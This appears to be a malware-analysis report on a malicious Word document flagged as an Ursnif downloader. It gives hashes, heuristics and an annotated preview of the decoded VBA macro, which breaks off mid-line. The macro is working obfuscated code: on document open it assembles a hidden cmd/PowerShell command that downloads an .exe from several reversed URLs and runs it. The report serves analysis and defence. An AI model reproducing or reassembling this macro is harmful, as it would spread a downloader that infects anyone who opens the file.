Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 43f9e8e3269982ba…

MALICIOUS

Office (OLE)

72.0 KB Created: 2018-09-09 22:17:00 Authoring application: Microsoft Office Word First seen: 2019-10-01
MD5: ed6ac0f4ca144755e54fcf57ee937a2e SHA-1: d47187ede930b6f72c8fd1a284240bce93315fb5 SHA-256: 43f9e8e3269982ba4c2c56aa2cced1aa0b00d3d9e99dae4b2fc88ba4f7b6f74a
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code as soon as a document is opened. The critical-severity heuristic for a Shell() call in VBA indicates that the macro attempts to execute external commands. The ClamAV detection Doc.Downloader.URSNIF-6729855-3 further supports classifying it as a downloader. The macro constructs a command line at runtime from many small string fragments and executes it; the command line appears to set up an environment for downloading a payload.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for the channel (macro, JS, link annotation, document body, ...) in which each URL was found.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace identifier that Office writes into documents, not a download location.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5666 bytes
SHA-256: 2b343f0198bcbdfd25ce93fe6707d46a4f4117b197646d614d3c797ac7ae0721
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NYAmpiqCzPKYmP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
' Word auto-executes this handler when the document is opened (the
' OLE_VBA_DOCOPEN heuristic above fires on it); no user action beyond
' enabling macros is needed.
' The next four physical lines are a single `On Error Resume Next`
' statement split with line continuations, presumably so the statement
' does not appear as one contiguous token sequence. It makes VBA ignore
' runtime errors, so the Shell call below is still attempted if anything
' before it fails.
On _
Error _
Resume _
Next
' `Second` is not defined anywhere in the visible preview; every call just
' concatenates random-looking literals. These look like padding inserted to
' defeat signature matching and are presumably no-ops — TODO confirm against
' the rest of macros.bas (5666 bytes; only the start is previewed).
   Second "381407839" + "wimvADjwjIVv" + "YPESPjnCIpwL" + "CErYFXiN"
   Second "423893704" + "S"
   Second "Sz" + "4288"
   Second "7168" + "294543505" + "6103" + "2862"
' The command line is assembled at runtime from three functions — YSFcLC
' and YctmrAvGb are shown below, OSVjhwRGiaj lies outside the preview — and
' is run with a hidden window (vbHide). This is the line the OLE_VBA_SHELL
' heuristic fires on; the string never exists in one piece in the source.
Shell YSFcLC + YctmrAvGb + OSVjhwRGiaj, CStr(vbHide)
   Second "YrWIZ" + "mUnnopj" + "7396" + "BcE"
End Sub



Attribute VB_Name = "wRbZNlD"
Function YSFcLC()
' Returns the first fragment of the command line that Document_open passes
' to Shell. Nothing here is a contiguous command string: each piece is a
' short literal, and the letters most useful for signatures are produced
' by Chr() of a summed constant — Chr(11 + 4 + 11 + 0 + 73) is Chr(99) ("c"),
' Chr(8 + 3 + 7 + 0 + 49) is Chr(67) ("C") and Chr(3 + 1 + 3 + 0 + 27) is
' Chr(34) (a double quote). Format() of a one-character string is that
' string, so the Format() wrappers add nothing but noise.

' Single statement split across continuations: suppress runtime errors.
On _
Error _
Resume _
Next
' `Second` is not defined in the visible preview; its calls concatenate
' random-looking literals and appear to be junk padding — TODO confirm it is
' a no-op in the remainder of macros.bas.
Second "NqCz" + "HBKFIASZTWw"
   Second "jQCZYPswm" + "wjnt" + "tp" + "490722702"
' With the Chr() values substituted, this fragment begins with
' c + "md /" + "V^:^O/" + C + " + "^s" + "e^t" — i.e. a cmd.exe invocation
' whose first command is a `set` of a variable named (after carets) dR36.
' The carets (^) and the runs of spaces/braces after "=" look like
' obfuscation padding that a later stage strips; that stage is not in this
' preview — TODO confirm how the value is cleaned and used.
JIXJRLoBMk = Format(Chr(11 + 4 + 11 + 0 + 73)) + "md /" + "V^:^O/" + Format(Chr(8 + 3 + 7 + 0 + 49)) + Format(Chr(3 + 1 + 3 + 0 + 27)) + "^s" + "e^t" + " ^dR^" + "3^6=^" + "   ^ " + "^   " + "^ ^  " + "^    " + "^ ^ " + "^ ^}}{^"
Second "L" + "iqWoId" + "4074" + "3927"
   Second "476995799" + "SXE" + "pmiWMRzGjIY" + "5856"
   Second "6324" + "8010" + "Sju" + "bYNZ"
' From here on the text reads backwards: "h" + c + "t" + "a" + c spells
' "hctac" ("catch" reversed) and the later "bt${yr" contains "try{"
' reversed, so the stored value looks like script source written in reverse,
' to be reversed back by the cmd stage before execution — TODO confirm
' against the full extracted macro.
LHrSVVG = "h" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "t^" + "a" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^};^ka^" + "erb;^D" + "^B^u$"
Second "SpwO" + "440879874" + "cGfptrMAO" + "2102"
   Second "262" + "100853746" + "bb" + "hjwtdWbC"
' Reversed fragment; note "el^iF" + "d^ao^l" + "nwo^D^" reads "DownloadFile"
' backwards once carets are removed, consistent with the downloader verdict.
WNLkzOl = "^ m^et^" + "I-^" + "e^" + "k^ovn^" + "I^;)" + "D" + "^Bu^$^ " + "^,^G" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^T$(" + "el^iF" + "d^ao^l" + "nwo^D^" + ".P^"
Second "tck" + "454007359"
   Second "SKVn" + "7426" + "q" + "knFtMPCUhEi"
' Reversed fragment (contains "try{" backwards).
EaVNK = "bt${yr" + "^t{)" + "^" + "F" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^l" + "$^ n" + "i^ " + "^G" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^" + "T" + "$("
Second "LdHWNTZqX" + "wjn"
   Second "25495363" + "hjV" + "kpfAJr" + "Z"
' Reversed fragment; "e" + "^" + "x^" + "e.^" reads ".exe" backwards.
vjuHcBuUUk = "h" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "aer" + "o" + "^f;'" + "e" + "^" + "x^" + "e.^'^" + "+" + "iPA" + "^$+^" + "'" + "^"
' Order of concatenation is what makes the fragments meaningful; the
' junk `Second` calls between assignments do not affect it.
YSFcLC = JIXJRLoBMk + LHrSVVG + WNLkzOl + EaVNK + vjuHcBuUUk
   Second "YiOSW" + "UNwXL"
   Second "335611277" + "q"
   Second "5701" + "B"
   Second "3376" + "aJzRJEPFVEjP" + "2355" + "296082838"
End Function
Function YctmrAvGb()

On _
Error _
Resume _
Next
Second "RV" + "uM" + "MK" + "FSsYTUDS"
   Second "KYCPcPBS" + "qkA" + "205758215" + "RkUfjTMz"
   Second "Rzbz" + "GOCAImKw"
jtMlmd = "\^'^+" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "i" + "lb^" + "up" + "^:vn^" + "e$" + "^=DB^u" + "^$;" + "^'^5^5" + "^" + "7" + "^' ^= "
Second "qjjF" + "UWkh"
   Second "t" + "7677"
PAnXPlKpfuB = "^iPA^$" + "^;" + ")^'@^'" + "(" + "^t^il^p" + "^"
Second "EYbowoWwdcGk" + "436467662"
   Second "fKCA" + "1808"
LodMOnwB = "S^.'m^" + "H^q^" + "a^x" + "/m^o" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^.yr^a" + "^dan^a" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/" + "/:p" + "^tt" + "^" + "h^@^Z" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/^set^"
Second "33551837" + "294342222"
   Second "jXj" + "F"
   Second "A" + "j" + "1261" + "310740337"
XioIhqbCb = "al^pm" + "e^t" + "/^d" + "^i." + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^" + "a." + "us^u.^b"
Second "zTTkZY" + "8006" + "6910" + "u"
   Second "PjLc" + "474210193" + "CQpfHM" + "zoB"
   Second "BvETLpw" + "Ckri" + "qtdzNk" + "350115799"
   Second "iDEs" + "AHCckjm"
TlKvlKsZSoT = "^" + "if//:p" + "tth@^L" + "^Y/" + "^p^j" + "." + "r^"
Second "29930127" + "SbXUjUpM" + "262251550" + "8009"
   Second "Ef" + "pTfi"
   Second "WqjAbiDZFR" + "5935"
   Second "Qrbz" + "OLb"
   Second "O" + "TsH" + "430160037" + "C"
RtpAOs = "e" + "v^er" + "^k" + "//:^p" + "^t^th^"
Second "Q" + "100341861" + "7493" + "oG"
   Second "I" + "bCj"
CVhzDZrTNS = "@y^" + "o" + "^M/^m^" + "o" + Format(Chr(11 + 4 + 11 + 0 + 73)) + ".^tro" + "pnev" + "^a^d^e^" + "irra" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/" + "/^:p" + "^t" + "t^h@"
Second "jsFDP" + "f" + "55792575" + "4582"
   Second "OMw" + "9065" + "jtfh" + "66570442"
   Second "qWwz" + "110735629" + "215707093" + "7991"
ErLrPjPj = "^" + "H^" + "l" +
... (truncated)